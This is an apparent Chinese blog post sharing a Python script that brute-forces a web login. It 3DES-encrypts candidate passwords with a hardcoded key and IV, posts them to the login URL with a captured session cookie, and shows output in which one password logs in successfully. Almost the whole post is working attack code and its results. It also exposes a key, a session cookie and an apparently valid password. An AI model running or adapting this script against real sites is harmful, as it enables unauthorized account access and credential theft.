记一次python3简单前端暴力破解的测试demo
from bs4 import BeautifulSoup
import urllib
import json
import requests
from pyDes import *
import pyDes
import base64
iv = b”99999999″#偏移量
key = base64.b64decode(“isiGuRWo36Gny+Y0yOU+rhYfL4kvUiOD”)#秘钥
reurl = “http://url”
header = {
“Host”: “rxxxx.xxx.xxxx”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Origin”: “http://xxxxx”,
“Content-Type”: “application/x-www-form-urlencoded; charset=UTF-8”,
“Referer”: “http://xxxxx/login/index.html”,
“Cookie”: “rmbUser=true; userName=test; SESSION=e798b36a-3be5-4a6b-988a-ff3bd698f808; JSESSIONID=1hn02bdzudukj1hpv89ngp2jm1”
}
def url_bp(pwd):
data={“username”:”bV/QXER9ntmjFl8AkizmQQ==”,”password”:pwd}
req = requests.post(url=reurl,headers=header,data=data)
print(req.text)
#3DES解密
def do_3des(result): # 解密
result = base64.b64decode(result)
k = triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)
d = k.decrypt(result)
print(“Decrypted: %r” % d)
def do_3des_encrypt(data): # 加密
k = triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)
d = k.encrypt(data)
d = base64.b64encode(d).decode(encoding = “utf-8”)
url_bp(d)
if __name__==”__main__”:
#do_3des(“usjL8Eysefa3JjUT41nl3Q==”)
dict1 = (“er6B#1DD”,”111111″)#密码字典列表
for i in dict1:
do_3des_encrypt(i)
print(i)
运行结果
> python3 pydes.py
{“businesskey”:””,”message”:”登录成功”,”messageFlag”:”1″,”messageList”:[],”messageMap”:{}}
er6B#1DD
{“businesskey”:””,”message”:”用户或密码错误!”,”messageFlag”:”2″,”messageList”:[],”messageMap”:{}}
111111